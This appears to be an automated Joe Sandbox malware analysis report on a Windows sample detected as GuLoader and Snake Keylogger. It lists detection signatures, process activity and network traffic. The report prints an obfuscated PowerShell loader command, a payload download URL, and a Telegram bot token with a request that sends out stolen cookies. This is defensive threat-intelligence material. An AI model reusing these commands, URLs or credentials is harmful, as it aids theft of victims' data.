Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rAntephialtic.exe

Overview

General Information

Sample name:rAntephialtic.exe
Analysis ID:1620273
MD5:65249febec3f7bde1c51b92ff5d3c4a7
SHA1:459c11b637dc859eacea6d65489729f7b32fbf27
SHA256:f9d051b1d729d3a1689e7b1454902012a5d757f5b5339db346ffcead746802f6
Tags:exeuser-Porcupine
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • rAntephialtic.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\rAntephialtic.exe" MD5: 65249FEBEC3F7BDE1C51B92FF5D3C4A7)
    • powershell.exe (PID: 7700 cmdline: "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 8180 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU", "Chat_id": "8187594209", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000006.00000002.2558138839.0000000025871000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000003.00000002.1830778551.000000000CF10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: msiexec.exe PID: 8180JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Msiexec Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8180, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49975
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7700, TargetFilename: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\rAntephialtic.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)", CommandLine: "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rAntephialtic.exe", ParentImage: C:\Users\user\Desktop\rAntephialtic.exe, ParentProcessId: 7568, ParentProcessName: rAntephialtic.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)", ProcessId: 7700, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-20T20:02:33.190660+010028033053Unknown Traffic192.168.2.749979104.21.32.1443TCP
          2025-02-20T20:02:37.130720+010028033053Unknown Traffic192.168.2.749985104.21.32.1443TCP
          2025-02-20T20:02:38.434124+010028033053Unknown Traffic192.168.2.749987104.21.32.1443TCP
          2025-02-20T20:02:41.150543+010028033053Unknown Traffic192.168.2.749991104.21.32.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-20T20:02:31.147629+010028032742Potentially Bad Traffic192.168.2.749977132.226.247.7380TCP
          2025-02-20T20:02:32.600834+010028032742Potentially Bad Traffic192.168.2.749977132.226.247.7380TCP
          2025-02-20T20:02:34.085155+010028032742Potentially Bad Traffic192.168.2.749980132.226.247.7380TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-20T20:02:26.278155+010028032702Potentially Bad Traffic192.168.2.749975142.250.184.238443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-20T20:02:50.061631+010018100081Potentially Bad Traffic192.168.2.749995149.154.167.220443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-20T20:02:43.485069+010018100071Potentially Bad Traffic192.168.2.749994149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU", "Chat_id": "8187594209", "Version": "4.4"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\rAntephialtic.exeReversingLabs: Detection: 21%
          Multi AV Scanner detection for submitted file
          Source: rAntephialtic.exeReversingLabs: Detection: 21%
          Source: rAntephialtic.exeVirustotal: Detection: 26%Perma Link
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.4% probability

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: rAntephialtic.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49978 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49975 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.7:49976 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49994 version: TLS 1.2
          Source: rAntephialtic.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_00406739 FindFirstFileW,FindClose,1_2_00406739
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405AED
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_00402902 FindFirstFileW,1_2_00402902
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 025EF45Dh6_2_025EF2C0

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49995 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49994 -> 149.154.167.220:443
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2021/02/2025%20/%2004:32:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU/sendDocument?chat_id=8187594209&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5298a6722dedHost: api.telegram.orgContent-Length: 1282
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
          Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
          Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49980 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49977 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49979 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49975 -> 142.250.184.238:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49987 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49991 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49985 -> 104.21.32.1:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49978 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2021/02/2025%20/%2004:32:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU/sendDocument?chat_id=8187594209&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5298a6722dedHost: api.telegram.orgContent-Length: 1282
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 20 Feb 2025 19:02:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: powershell.exe, 00000003.00000002.1828142930.0000000008382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
          Source: rAntephialtic.exe, 00000001.00000000.1292918394.000000000040A000.00000008.00000001.01000000.00000003.sdmp, rAntephialtic.exe, 00000001.00000002.1362477384.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000003.00000002.1814890454.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: msiexec.exe, 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000003.00000002.1814890454.00000000049D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 00000006.00000002.2558138839.0000000025815000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.0000000025846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 00000006.00000002.2558138839.0000000025815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
          Source: msiexec.exe, 00000006.00000002.2558138839.0000000025810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000006.00000002.2545108464.000000000994A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 00000006.00000002.2545108464.000000000994A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/G
          Source: msiexec.exe, 00000006.00000002.2555774370.0000000024B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB
          Source: msiexec.exe, 00000006.00000002.2545108464.000000000994A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoBW
          Source: msiexec.exe, 00000006.00000002.2545108464.000000000994A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB_
          Source: msiexec.exe, 00000006.00000003.1968586148.00000000099C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1op1yD792kZI-PIBIgKY8tFU8QiYMScoB&export=download
